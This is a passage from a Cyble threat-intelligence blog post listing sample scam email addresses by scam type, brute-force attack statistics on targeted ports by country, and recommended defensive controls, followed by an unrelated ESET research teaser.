Cyble identified 410 new email addresses used in scam campaigns. Here are six notes:
E-mail Subject
Scammers Email ID
Scam Type
Description
Claim Directives
info@szhualilian.com
Claim Scam
Fake refund against claims
Dear winner!
info@student.htw-berlin.de
Lottery/Prize Scam
Fake prize winnings to extort money or information
DONATION NOTICE
m.sharifi@qiau.ac.ir
Donation Scam
Scammers posing as donors to donate money
INVESTMENT PROPOSAL
Walsh.philip@natwest.co.uk
Investment Scam
Unrealistic investment offers to steal funds or data.
Order: cleared customs
support@ip.linodeusercontent.com
Shipping Scam
Unclaimed shipment trick to demand fees or details
UN Compensation Fund
info@usa.com
Government Organization Scam
Fake UN compensation to collect financial details
Of the thousands of brute-force attacks identified by Cyble, the following targeted ports stand out as meriting attention.
Based on a close inspection of the distribution of attacked ports based on the top five attacker countries, Cyble noticed attacks originating from the United States are targeting ports 22 (40%), 3389 (32%), 445 (21%), 23 (4%), and 80(3%). Attacks originating from Turkey are targeting ports 3389 (100%). Russia, China, and Bulgaria mainly targeted ports 5900 and 445.
Security Analysts are advised to add security system blocks for the attacked ports (such as 22, 3389, 443, 445, 5900, and 3306).
Cyble researchers recommend the following security controls:
Blocking target hashes, URLs, and email info on security systems (Cyble clients received a separate IoC list).
Immediately patch all open vulnerabilities listed here and routinely monitor the top Suricata alerts in internal networks.
Constantly check for Attackers’ ASNs and IPs.
Block Brute Force attack IPs and the targeted ports listed.
Immediately reset default usernames and passwords to mitigate brute-force attacks and enforce periodic changes.
For servers, set up strong passwords that are difficult to guess.
The post Cyble Honeypot Sensors Detect WordPress Plugin Attack, New Banking Trojan appeared first on Cyble.
Blog – Cyble – Read More
ESET research examines the group’s malicious wares as used to spy on targets in Ukraine in the past two years
WeLiveSecurity – Read More